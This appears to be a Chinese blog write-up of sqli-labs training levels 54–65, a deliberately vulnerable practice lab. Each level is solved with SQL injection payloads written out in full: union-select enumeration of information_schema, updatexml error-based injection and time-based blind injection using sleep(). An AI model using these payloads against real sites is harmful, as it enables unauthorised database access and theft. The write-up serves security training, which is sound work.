Less_54

Less-54:使用’’包裹

对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名

输入:?Id=1’ order by 3--+   查看有多少列;

输入 ?id=-1' union select 1,2,3 --+ 查看回显位置;

输入  ?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+  查看表名;

下面操作和less1基本一致。

Less_55

Less55: 使用()包裹 

  对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

 

Less_56

Less56:使用('’)包裹  

对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

Less_57

Less57:使用””包裹

对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

Less_58

Less58:使用’’包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

输入 ?id=-1' union select 1,2,3 --+   并没有显示回显的位置;

所以我们不能使用union select联合查询,我们使用报错注入;

输入 ?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+  查表名;

接下来步骤与less1基本一致。

Less_59

Less59:无包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

输入?id=-1 union select 1,2,3 --+  依旧没有回显位置;

所以同58关相同,使用报错注入。

Less_60

Less60:使用(“”)包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

采用报错注入与第58关基本一致

Less_61

Less61:使用((‘’))包裹

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

 采用报错注入与第58关基本一致

Less_62

Less62:使用(‘’)包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注

输入 ?id=1') and if((length(database())=1),1,sleep(5))--+  判断数据库的长度;

输入 ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 's' ,1, sleep(5)) --+  判断数据库字母是否比s大;

less_63

Less63:使用‘’包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

less_64

Less64:使用(())包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

 

 

Less_65

Less65:使用(“”)包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

 

 

sqli-libs(54-65关)的更多相关文章

  1. 靶场练习-Sqli-labs通关记录(1-4关)

                              0x00 实验环境 本地:Win 10 靶场:sqli-labs(共65关,每日一关) 0x02 通关记录 简介:一天一关! (1)第一关: 简单的 ...

  2. R语言入门系列1--数学狗还是做数据好了

    nanana,作为一个不合格的数学专业学生,脑袋不好使,又穷逼,只好学点儿实用的东西,希望能养活自己~~~ 不瞎哔哔,想做数据方面工作的时候在犹豫是学R还是学python,一点儿python基础都没有 ...

  3. JavaScript基础知识点

    本书目录 第一章:  JavaScript语言基础 第二章:  JavaScript内置对象第三章:  窗口window对象第四章:  文档document对象第五章:  表单form对象第六章:   ...

  4. MFS分布式文件系统

    一.MFS概述: MooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目录树 ...

  5. Linux MFS分布式文件系统介绍和安装

    MFS分布式文件系统 mooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目 ...

  6. 为什么hadoop中用到的序列化不是java的serilaziable接口去序列化而是使用Writable序列化框架

    继上一个模块之后,此次分析的内容是来到了Hadoop IO相关的模块了,IO系统的模块可谓是一个比较大的模块,在Hadoop Common中的io,主要包括2个大的子模块构成,1个是以Writable ...

  7. 一次修改闭源 Entity Provider 程序集以兼容新 EntityFramework 的过程

    读完本文你会知道,如何在没有源码的情况下,直接修改一个 DLL 以去除 DLL 上的强命名限制,并在该程序集上直接添加你的“友元程序集(一种特殊的 Attribute,将它应用在程序集上,使得程序集内 ...

  8. php中用GD绘制折线图

    php中用GD绘制折线图,代码如下: Class Chart{ private $image; // 定义图像 private $title; // 定义标题 private $ydata; // 定 ...

  9. Python基础三. 函数、lambda、filter、map、reduce

    一.概述 函数, 就是用一些语句组织起来实现一组特定的功能, 用来重复调用. 函数的作用及意义:最大化的重用代码和最小化的代码冗余以及对流程的分解. Python中有哪些函数: 内建的函数 第三方模块 ...

  10. 数组 Arrays类

    1.数组是一组变量集合,用来存储相同数据类型的一组数据的连续的空间. *数组名(标识符)连续空间首地址. *元素下标标明元素在数组中的位置,从0开始. *每个元素都可以通过下标来访问. *数组长度固定 ...

随机推荐

  1. 第四十九篇 入门机器学习——数据归一化(Feature Scaling)

    No.1. 数据归一化的目的 数据归一化的目的,就是将数据的所有特征都映射到同一尺度上,这样可以避免由于量纲的不同使数据的某些特征形成主导作用.   No.2. 数据归一化的方法 数据归一化的方法主要 ...

  2. jacob导入项目

    在 resource 下创建一个 lib 将网上下载的 jacob.jar 放入其中 在 pom 文件中导入相对应的 jar 包 <dependency> <groupId>c ...

  3. Spark Streaming:updateStateByKey报错 is not applicable for the arguments...

    ones.updateStateByKey(new Function2<List<Integer>, Optional<Integer>, Optional<Int ...

  4. django实现简易登录注册

    经过一些文档的理解,以及一些时间的琢磨.我觉得可以用django做一些小项目了 先说说登录功能吧. 先创建一个app,用admin命令 在cmd打开到manage.py同级目录下,django-adm ...

  5. mysql行级锁 select for update

    mysql行级锁 select for update 1.属于行级锁 2.where条件后需要写出明确的索引条件(如果有多个条件,可以建立联合索引) 3.如果其所在的事务提交或者回滚后,或者更新该条数 ...

  6. (原创)SpringBoot入门

    本文章是SpringBoot入门的介绍在这里   我会尽量写一些细节性的东西,我用的是IDEA2016  Tomcat7 JDK1.8 Maven3.3.9 IDEA Tomcat JDK Maven ...

  7. Hibernate的理论知识点

    转自网络 一. 对象持久化的理论 1.对象持久化:内存中的对象转存到外部持久设备上,在需要的时候还可以恢复. 2.对象持久化的原因(目标): 物理: 1) 内存不能持久,需要在硬盘上持久保存 //(物 ...

  8. intermediate-python-for-data-science

    目录 matplotlib plot Scatter Plot histogram Customization Dictionaries, Part 1 Create dictionary dicti ...

  9. mybatis(五):源码分析 - config文件加载流程

    详细的可以参考https://blog.csdn.net/weixin_33850890/article/details/88112849

  10. PHP程序员应该如何提升

    PHP程序员应该如何提升 尤其不认可W3school之类的东西,不够深度,理解不深,比起这个更建议看官方文档,中文不清楚,看英文的. 入门视频:入门视频推荐:哈佛大学公开课:构建动态网站Beginne ...